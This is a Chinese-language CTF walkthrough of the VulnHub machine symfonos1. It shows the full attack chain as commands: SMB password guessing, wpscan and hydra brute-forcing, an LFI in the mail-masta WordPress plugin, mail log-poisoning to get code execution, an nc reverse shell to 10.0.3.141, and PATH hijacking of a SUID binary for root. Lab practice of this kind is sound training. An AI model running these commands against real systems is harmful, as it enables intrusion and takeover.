主機來源:www.vulnhub.com
下載地址:https://download.vulnhub.com/symfonos/symfonos1.7z
用到的知識點:
SMB使用
wpscan
本地文件包含和寫郵件getshell
修改環境變量提權
發現IP
IP爲10.0.3.150
nmap
SMB
直接使用SMB協議,使用anonymous用戶登錄
發現一個文件
我猜有人用了這些密碼
還發現一個用戶
試一下用上面的密碼登錄下helios
smbclient //10.0.3.150/helios --user=helios
最後用了qwerty進來了
全部get下來讀一下
根據他說的work on /h3l105 我就去web下訪問了,結果真有
wordpress兄弟,上wpscan 這裏插一句,站點會解析到symfonos.local中, 我們在/etc/hosts的文件中修改一下(不改也行,就是訪問的慢一些)
wpscan
wpscan --url http://10.0.3.150/h3l105 --wp-content-dir -ep -et -eu
找到一個用戶,是admin
我爆破一下(沒暴破出來)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.0.3.150
掃插件
wpscan --url http://symfonos.local/h3l105 --enumerate p
找到兩個插件
去查一下有沒有漏洞
有個本地文件包含
通過我們的實際插件地址去訪問
後面拼接參數,發現漏洞存在
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
getshell
發現可以讀本地文件,那如果要getshell,我們就需要能寫進去一些什麼,現在想到25端口是開着的,一定有用,那就用寫郵件的方式去寫文件進去。
先看一下我們能不能讀郵件
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
可以讀,那接下來開始寫郵件
已經收到郵件
執行shell
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=id
我們彈個shell回來
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc%2010.0.3.141%20443%20-e%20/bin/bash
變個好用的shell
'import pty;pty.spawn("/bin/sh")'
提權
sudo -l了一下沒東西
然後
find / -perm -u=s -type f 2>/dev/null
找到一個奇怪的程序,我們把他放在web目錄下,然後下下來
本地strings一下
發現一個curl命令,沒有加絕對路徑,我們想辦法去修改環境變量
先下一個rootshell過來,
然後編譯他(這時候我在web目錄下(var/www/html),因爲這裏我有寫權限)
gcc rootshell.c -o curl
然後把這裏加到環境變量的最前邊
執行程序
獲得root